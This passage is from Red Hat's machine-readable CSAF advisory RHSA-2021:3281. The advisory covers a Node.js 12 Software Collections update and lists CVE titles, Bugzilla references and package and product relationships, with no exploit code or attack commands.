"7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: HTTP request smuggling via two copies of a header field in an http request" } ] }
rhsa-2021_3281
Vulnerability from csaf_redhat
Published
2021-08-26 10:18
Modified
2024-11-15 10:36
Summary
Red Hat Security Advisory: rh-nodejs12-nodejs and rh-nodejs12-nodejs-nodemon security update
Notes
Topic
An update for rh-nodejs12-nodejs and rh-nodejs12-nodejs-nodemon is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: rh-nodejs12-nodejs (12.22.5).
Security Fix(es):
* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22930)
* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22940)
* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
* c-ares: Missing input validation of host names may lead to domain hijacking (CVE-2021-3672)
* nodejs: Improper handling of untypical characters in domain names (CVE-2021-22931)
* nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite (CVE-2021-32803)
* nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite (CVE-2021-32804)
* nodejs: Incomplete validation of tls rejectUnauthorized parameter (CVE-2021-22939)
* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for rh-nodejs12-nodejs and rh-nodejs12-nodejs-nodemon is now available for Red Hat Software Collections.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: rh-nodejs12-nodejs (12.22.5).\n\nSecurity Fix(es):\n\n* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22930)\n\n* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22940)\n\n* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* c-ares: Missing input validation of host names may lead to domain hijacking (CVE-2021-3672)\n\n* nodejs: Improper handling of untypical characters in domain names (CVE-2021-22931)\n\n* nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite (CVE-2021-32803)\n\n* nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite (CVE-2021-32804)\n\n* nodejs: Incomplete validation of tls rejectUnauthorized parameter (CVE-2021-22939)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:3281", "url": "https://access.redhat.com/errata/RHSA-2021:3281" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "1956818", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1956818" }, { "category": "external", "summary": "1988342", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988342" }, { "category": "external", "summary": "1988394", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988394" }, { "category": "external", "summary": "1990409", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990409" }, { "category": "external", "summary": "1990415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990415" }, { "category": "external", "summary": "1993019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993019" }, { "category": "external", "summary": "1993029", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993029" }, { "category": "external", "summary": "1993039", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993039" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_3281.json" } ], "title": "Red Hat Security Advisory: rh-nodejs12-nodejs and rh-nodejs12-nodejs-nodemon security update", "tracking": { "current_release_date": "2024-11-15T10:36:45+00:00", "generator": { "date": "2024-11-15T10:36:45+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:3281", "initial_release_date": "2021-08-26T10:18:55+00:00", "revision_history": [ { "date": "2021-08-26T10:18:55+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-08-26T10:18:55+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T10:36:45+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } } ], "category": "product_family", "name": "Red Hat Software Collections" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "product": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "product_id": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1.el7?arch=src" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "product": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "product_id": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-5.el7?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "product": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "product_id": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "product": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "product_id": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-devel@12.22.5-1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "product": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "product_id": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-npm@6.14.14-12.22.5.1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "product": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "product_id": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-debuginfo@12.22.5-1.el7?arch=x86_64" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "product": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "product_id": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "product": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "product_id": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-devel@12.22.5-1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "product": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "product_id": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-npm@6.14.14-12.22.5.1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "product": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "product_id": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-debuginfo@12.22.5-1.el7?arch=s390x" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "product": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "product_id": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "product": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "product_id": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-devel@12.22.5-1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "product": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "product_id": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-npm@6.14.14-12.22.5.1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "product": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "product_id": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-debuginfo@12.22.5-1.el7?arch=ppc64le" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "product": { "name": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "product_id": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-docs@12.22.5-1.el7?arch=noarch" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "product": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "product_id": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-5.el7?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le as a component of Red Hat Software Collections for 